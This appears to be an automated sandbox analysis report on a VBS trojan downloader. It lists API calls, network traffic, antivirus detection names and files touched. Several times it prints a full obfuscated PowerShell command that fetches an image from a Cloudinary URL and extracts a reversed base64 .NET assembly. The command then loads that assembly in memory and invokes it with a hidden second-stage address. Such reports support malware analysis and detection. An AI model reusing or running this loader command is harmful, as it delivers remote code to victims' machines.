NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b3c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b3d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b3e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b3f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received ]
Data received Y»<„š‰x¹v¢OÄ÷„q㼗ÿ×mÂó:DOWNGRD ¬=#;¿¨Ðñì»íU…wö·©¥YP;Wd¬g²{ÌÃxÀÿ 
Data received 8
Data received 41Ó0‚Ï0‚·  É2M¯ý1ø0  *†H†÷  0´1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.1-0+U $http://certs.godaddy.com/repository/1301U*Go Daddy Secure Certificate Authority - G20 241218123855Z 260114153644Z0W1 0 UIL10U Petah Tikva10U Cloudinary Ltd10U *.cloudinary.com0‚"0  *†H†÷ ‚0‚ ‚„ÿ\×ZÖwi<õe˜ºBÄô§-s¡2·f¾¦»&š‚§L°R›–g!¨ËGÆЪ%—t%ŸLµú3Šë.ˆ½ZÎZҝ¤½8 7äGY4îՎó™¦_¸Éfz,)VäõLéêÑa€JJb.ò)í¨¡K,ð£UËïnÆ©"C¨8ì­°*`ôÈIk+mÙWFç´}!$ oÒVí;séËȈû> ­£­|X¦­žuIô9Û þrRñ¶è02eÅ]ãõ¥¬+›æ4¬kf´ª@w /ý¿hÃçš/àÏãà…£ˆ”ÎΏŒ¯qÊurú5aÐy¡¹j‹Å£‚?0‚;0 Uÿ00U%0++0Uÿ 06U/0-0+ ) '†%http://crl.godaddy.com/gdig2s2-41.crl0]U V0T0H `†H†ým0907++http://certificates.godaddy.com/repository/0g 0v+j0h0$+0†http://ocsp.godaddy.com/0@+0†4http://certificates.godaddy.com/repository/gdig2.crt0U#0€@½'ŽÌ4ƒ0¢3×ûl³ð´,€Î0+U$0"‚*.cloudinary.com‚cloudinary.com0U˜0¦oIT xV»‹Zˆ5ÀWe0‚~ +Öy‚n‚jhvW”¼ó®©>3,™³÷ß›Â=q2%Ý!©%¬aÅN!“ÙÇF™G0E ~DXhêXPÀäT×èGIÑïëz7iõB¥p˜Ú/!­Á2ìVÛÜ=d¦º¤ò²¢òzÏùœîž (µ;íÕFvdÄl¤짉¢.¼«O(Ô5'«êþÕÉ}Íð“ÙÇGµG0E ,CŽ}ÏÈÕ ÜK@@J­°ÔZ©äûjÕòîwsr< E­¹!ËQ¾V„µtíZ«ê¤Ï$,èÇð ñÿÐTÏ£ÑvË8÷‰|„¡D_[ÁÝûÉnòšYÍG i…°ËÃXç“ÙÇHºG0E mâ6סÄÒOR è5109„ã!»çȋÉY`.!Ù½„\疘·žŒ¶.÷AŒdœ/šÎø½ þÖg·ÂÝ0  *†H†÷  ‚OI´’Hå)æ~8ÆîñKÿ¸ Ê+ц=²Tó¹ãµ‚aÇùˆø•Z FpdF× Á´­Åu¤ #¥¶:{ð‹Å¿»Qÿ̦R'ÆFÕÍjn³‚×zl¼ãÆ'_@Îmª‡Ö®–x§Â2$ΆÄÀü§ÁP±‰ðÒô%áe›Ö€/£xœc„{±WyÿÞ ØêUö¥×~<UÔ¾nuÜê2§âR¯ÄNµyŽ5NjïBÔ¨[iöR>á`µ) Á®ð ß _wéš_)hù{í¦!x &ÐîΧ¬6eö¼zÓ³¥µÀ …* ãċ y`Ûé.g­p ðâ›OvÅAÔ0‚Ð0‚¸ 0  *†H†÷  0ƒ1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.110/U(Go Daddy Root Certificate Authority - G20 110503070000Z 310503070000Z0´1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.1-0+U $http://certs.godaddy.com/repository/1301U*Go Daddy Secure Certificate Authority - G20‚"0  *†H†÷ ‚0‚ ‚¹àËÔ¯v½Ô“bë0d¸lÃÙbŽ/ÿ>eϏÎbæ<RÚEKU«xkcƒbÎil™È‹LÌE3êˆÜž£¯+þ€ayWÄÏ.ô?0<]Güš¼Ã7–AQŽKTø(¾ÐŒ¾ð08ó°&øfGcmÞq&G8GSÑF´ãÜêE¬½¼qÙªoÛÛÍ0:yO_LGøï[Âĝ`;±²C‘ؤ3Nê³Ö'O­%Š¥ÆôÕЦ®tdWˆµDUÔ-*:>ø¸½é2 ”dÄ:PñJ®çy3¯ èß9ÂilcRúwÁÈt‡È¹“PT5KiN¼;ÓI.ÜÁÒRû£‚0‚0Uÿ0ÿ0Uÿ0U@½'ŽÌ4ƒ0¢3×ûl³ð´,€Î0U#0€:š…g(¶ïö½An Á”ÚÞ04+(0&0$+0†http://ocsp.godaddy.com/05U.0,0* ( &†$http://crl.godaddy.com/gdroot-g2.crl0FU ?0=0;U 0301+%https://certs.godaddy.com/repository/0  *†H†÷  ‚~l“È8¸–©Kÿ¡_Oïl>œˆÉP¦s÷W1¾¼ä/ÛøºÓ[à´çæyb ¢×jcs1µõ¨H¤;-¢]×´|%OV0ĶD{,å^æï aª¿ä*¸ƒ}ÁCÎD§p ‘ôÈ­ƒ`ÙØr¨s$µ¬"ʉbXD«‰%ÍÄbÛQ´ÓQ*›ô¼süvÎ6¤ÍÙØ,ꮛõ*²ÑMuŠ?ŠA#}[Kþ¤X›F²Ã``ƒø}PAΡÃ»ï/ÒTîDÙ ®§Š3í±-v6&ÜëŸ÷a܇oîF–(­¡&} §.£¼ø¼00‚}0‚e ç0  *†H†÷  0c1 0 UUS1!0U The Go Daddy Group, Inc.110/U (Go Daddy Class 2 Certification Authority0 140101070000Z 310530070000Z0ƒ1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.110/U(Go Daddy Root Certificate Authority - G20‚"0  *†H†÷ ‚0‚ ‚¿qbñúY4÷É£÷€IXé"ƒ¦Å C;„ñæ…IŸ'êö„N ´Ûp˜Ç2±>NîôúO/Y0"ç«Vkâ€üóu€9Q{åù5¶tN©‚ä¶?©ƒú¢¾ŠjÞ Ã¶Êêè”;F|2 óf"ȍim6Œ·Ó²`´8úŒÎÓÝFÞ >ë]|È|û°+S¤’biQ%aDŒ,©C–#߬:š)Å©é]¶žž0 9Îñˆ€ûK]Ì2ì…bC%4V'‘´;p*?n±èœˆ}ŸÔùÛSm`¿,çX«¸_FüÎÄ< ëI1\iF³àG£‚0‚0Uÿ0ÿ0Uÿ0U:š…g(¶ïö½An Á”ÚÞ0U#0€ÒİґÔLq³aË=¡þݨjÔã04+(0&0$+0†http://ocsp.godaddy.com/02U+0)0' % #†!http://crl.godaddy.com/gdroot.crl0FU ?0=0;U 0301+%https://certs.godaddy.com/repository/0  *†H†÷  ‚Y S½’†§${í[1ÏlpŸn¾N»ö¾—Pá0º(\b”Âã~3÷ûBv…Û•Œ"Xu ˆeg9  Å 8—¤Å#“?´¦D‘ã§i'´Z%:·2Í݄ÿ*8)3¤
Data received Ýg²…þ¡ˆ P‰ÈÜ*öB7LæˆßÕ¯$ò±Ãß̵ìà™^·IT <” ÇRI¤má³X ÉØìÙ®2Ž(p âþ¦ž„½Wp³Zé †S»ï|ÿi àH÷“ È TĬ]g7lÊ¥/17ªnoŒ¼›âW]$¯——œ„­l¬7Lfóa‘ ä¾0Ÿz¤) °á4_dw@Qߌ0¦¯
Data received K
Data received GA–TŒž éËýzÆù#Ž2ºS³(âê÷¬”'Œï­•àßþ؏'x¦7MMõ‹¢W‚¤l*òÏì8êūѳžE;~L ÒÁrMm‰*þÛz{DÓÛt{œ#ŒPÅ:Œ!Dµá˜§¨Š–à©6š6Š±{"Z¼QTEüObP>Èð:O;ò¯û÷7–9 ¦Ÿaw.§Iu i˜êÌ꾪ƒß5Æ£¤ãÌ0Å皎6={º1×Côl½Qϕ‡DxMåȔ/tŠÁ4<B£ò£BHPÊözõkV7C‘i"N;±òÛz 3ÝáãSzËô¤´»t¶{m¬Ýï˜Q‚a¦SË2*±‘3•*1!Ü6x }NQ¡5ßZr9y ؀G9oáåFs‚àæᄟ"ÔzQê*Dû¸©
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received M³{ ‰+³WròG@¬&QÈÏZÍÊúD!ýçh(»”@½Ò²÷,ä©j€ðyj¹
Data received Ð
Data received HVeÐ$‰|¤ÒæO)˜ ¡x†N†ï±™8èi×ÿ@q±gù~“ãFäu «É^mJ]E|¦¬ÈØ<Ô¾‡G½ÿŽ•j œŸÃ©!®K‹V!CAl¬0Þ»ù(?fe„ƒu Œq — )ùñP>vÀ¸Û+ ³V쐋—ÌÔ±òî¤áíP=Ø=&4éE__Vë‘%€‹t§•äúO³{᷅r‡ 2¢öåÝé²þWX+ ~×¾ìyÍ9^³bìÓðªËíÉÔ(Áì<¤âéYÕ(øáì fн~â܎¢òdL„[î^Ê»¡ð^Á]×zâ¶%à‘)ãA¢!3ËrW¨&\’(g©4í*ÿ÷˜JÔ[”ß¾{|괏„¿}Èèƚ.…9"¡\ñ?Ð>‚o \OŽsCtÒÃØ[m¬ÿp’g,´7W!‘ þõN÷¡"·Ó''÷ž DWÅc]ôc¥Å®Ýtã}*ŸñX_“1÷«†Teì€ ÁEþœåº½Ï(¹<›üFæ„ÐuX¬P¼Òúë&Áôt$€A‘s¿áQ ¿8ÿ«~9ìÇ!Döµ-胷¹RÍ1…-27Áà^ hF)ñD AI?»× §î±Oâé=PlMâ#r¹ÃÛm}bÚMýGׁHóaö»ÝÏfÒß·û]½\Îcø:Tÿ>øÎò— q¾j׈‡ôS¥‘{V`‘ ÊAãzÓò‰ÕÉðû”ÄåܕËRÚ#€׫Ï{)*þ j…9Foý¹me‹w,nø÷ŠÝBÖKhy¯Œªmö|3$ãIô܇^\zøœÙµ’â{ cï(n©ȸ©Ú¸¦ÍuRã©Áe³Ûó­É…*Ëd}žq?¤+¯sÕån$K52´ßÚㆲϺ~k"æw[릝›ºß‚™Cò‡>ò
Data sent uqgƒSå†Å:Cô12”Žš{ÌjP?|Pè.­/5 ÀÀÀ À 280ÿres.cloudinary.com  
Data sent FBAt‡yoaYeS+Ž Tš©)¦Vcáb}ƒæ]9˜£ýCjÜèšj&O8t{¨óÝÝTT•Ç‹•/’z2+¼S0¾¥{ ƒb3ÅcèÀŒšŒ~4¦c¿-ó/} Nq="úŒ,<bç—q‡oâ|ÛM
Data sent  6ÇmÀJB Ÿý¤Z©ì9kaªÄ:ÿžà" ²^zèhp `«UÖ4|T¸\ÞÃ$¼?û$y÷Þ«a÷AFšzô&u뙢ëªÍ@¥Ê·§A •t]WŠ†¹õBÂÐÆ-™ &¢©ß÷§œU¿S֌¢Ë„߁.› ·'MŽµßۍw²Îê0FÞ¸tg epo +5K!¤Þ8L‰‰Ì ý‘ŠÆ>u,
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
Time & API Arguments Status Return Repeated

send

buffer: uqgƒSå†Å:Cô12”Žš{ÌjP?|Pè.­/5 ÀÀÀ À 280ÿres.cloudinary.com  
socket: 1416
sent: 122
1 122 0

send

buffer: FBAt‡yoaYeS+Ž Tš©)¦Vcáb}ƒæ]9˜£ýCjÜèšj&O8t{¨óÝÝTT•Ç‹•/’z2+¼S0¾¥{ ƒb3ÅcèÀŒšŒ~4¦c¿-ó/} Nq="úŒ,<bç—q‡oâ|ÛM
socket: 1416
sent: 134
1 134 0

send

buffer:  6ÇmÀJB Ÿý¤Z©ì9kaªÄ:ÿžà" ²^zèhp `«UÖ4|T¸\ÞÃ$¼?û$y÷Þ«a÷AFšzô&u뙢ëªÍ@¥Ê·§A •t]WŠ†¹õBÂÐÆ-™ &¢©ß÷§œU¿S֌¢Ë„߁.› ·'MŽµßۍw²Îê0FÞ¸tg epo +5K!¤Þ8L‰‰Ì ý‘ŠÆ>u,
socket: 1416
sent: 165
1 165 0
parent_process wscript.exe martian_process powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Lionic Trojan.Script.Generic.4!c
CTX vba.trojan.generic
Skyhigh BehavesLike.VBS.Dropper.dp
VIPRE Trojan.GenericKD.75319820
Arcabit Trojan.Generic.D47D4A0C
ESET-NOD32 VBS/TrojanDownloader.Agent.ABLH
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Trojan.GenericKD.75319820
MicroWorld-eScan Trojan.GenericKD.75319820
Rising Trojan.Undefined!8.1327C (TOPIS:E0:aV1J8kMRwPR)
Emsisoft Trojan.GenericKD.75319820 (B)
Ikarus Trojan-Downloader.VBS.Agent
FireEye Trojan.GenericKD.75319820
Google Detected
Antiy-AVL Trojan/Script.Agent
Kingsoft Script.Trojan.Generic.a
Microsoft Trojan:Script/Sabsik.FL.A!ml
GData Trojan.GenericKD.75319820
Tencent Vbs.Trojan-Downloader.Der.Iflw
AVG Script:SNH-gen [Trj]
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe